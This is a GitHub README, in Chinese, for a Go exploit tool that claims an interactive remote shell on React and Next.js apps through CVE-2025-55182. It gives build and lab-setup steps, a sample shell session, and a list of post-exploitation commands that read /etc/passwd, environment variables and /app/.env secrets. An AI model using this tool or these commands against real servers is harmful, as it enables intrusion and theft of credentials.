hexsh1dow/CVE-2025-55182
GitHub: hexsh1dow/CVE-2025-55182
这是一个针对 React Server Components 严重漏洞 CVE-2025-55182 的 Go 语言利用工具,能为受影响的 React 或 Next.js 应用提供交互式远程代码执行 Shell。
Stars: 3 | Forks: 0
# 👻 CVE-2025-55182 Go 利用工具
## 🎯 这是什么?
**CVE-2025-55182** 是一个极简的、交互式 RCE 利用工具,针对 **CVE-2025-55182**,这是 React Server Components (RSC) 中的一个严重漏洞,影响 React 19.0.0 - 19.2.0 和 Next.js 应用程序。
## 📦 安装
### 前置条件
- Go 1.18 或更高版本
- 运行 React 19.0.0 - 19.2.0 的易受攻击目标
### 从源码构建
```
git clone https://github.com/hexsh1dow/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go
```
## 🚀 使用方法
### 基本用法
```
./CVE-2025-55182
```
### 交互式会话
```
_____________ _______________ _______________ ________ .________ .________.____________ ______ ________
╲_ ___ ╲ ╲ ╱ ╱╲_ _____╱ ╲_____ ╲ _ ╲ ╲_____ ╲ │ ____╱ │ ____╱│ ____╱_ │╱ __ ╲ ╲_____ ╲
╱ ╲ ╲╱╲ Y ╱ │ __)_ ______ ╱ ____╱ ╱_╲ ╲ ╱ ____╱ │____ ╲ ______ │____ ╲ │____ ╲ │ │> < ╱ ____╱
╲ ╲____╲ ╱ │ ╲ ╱_____╱ ╱ ╲ ╲_╱ ╲╱ ╲ ╱ ╲ ╱_____╱ ╱ ╲╱ ╲│ ╱ ── ╲╱ ╲
╲______ ╱ ╲___╱ ╱_______ ╱ ╲_______ ╲_____ ╱╲_______ ╲╱______ ╱ ╱______ ╱______ ╱│___╲______ ╱╲_______ ╲
╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱
React2Shell RCE | CVE-2025-55182
@hexsh1dow
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Target: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] VULNERABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)
ghost@rce $ whoami
node
ghost@rce $ pwd
/app
ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash
ghost@rce $ exit
```
**受影响版本:**
- React 19.0.0, 19.1.0, 19.1.1, 19.2.0
- 使用这些 React 版本的 Next.js 应用程序
**已修复版本:**
- React 19.2.1+
- 更新了 React 依赖的 Next.js
## 🧪 测试实验室搭建
想要安全地进行测试?搭建一个易受攻击的实验室环境:
```
# 克隆易受攻击的 Next.js 应用
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182
# 安装并运行
npm install --legacy-peer-deps
npm run dev
# 在另一个终端中,运行 ghost-scanner
./CVE-2025-55182
# 输入:localhost:3000
```
## 📚 常用命令
```
ghost@rce $ id # Check user privileges
ghost@rce $ whoami # Current username
ghost@rce $ pwd # Current directory
ghost@rce $ ls -la # List files
ghost@rce $ cat /etc/passwd # Read files
ghost@rce $ uname -a # System information
ghost@rce $ env # Environment variables
ghost@rce $ ps aux # Running processes
ghost@rce $ netstat -tulpn # Network connections
ghost@rce $ cat /app/.env # Application secrets
```
## 🔗 参考资料
- [CVE-2025-55182 详情](https://cloud.projectdiscovery.io/library/CVE-2025-55182)
- [React 安全公告](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [Next.js 安全公告](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp)
- [maple3142 的原始 PoC](https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3)
- [Assetnote 研究](https://github.com/assetnote/react2shell-scanner)
- [易受攻击的测试应用](https://github.com/zack0x01/vuln-app-CVE-2025-55182)
## 📝 许可证
本项目采用 MIT 许可证授权 - 详见 [LICENSE](LICENSE) 文件。
**由 hexsh1dow 用 👻 制作**
**Happy hacking ⚡**
标签:CISA项目, CVE-2025-55182, EVTX分析, EXP, Go语言, RCE, React, React 19, React Server Components, RSC, Syscalls, Web安全, 交互式工具, 日志审计, 程序破解, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 隐私保护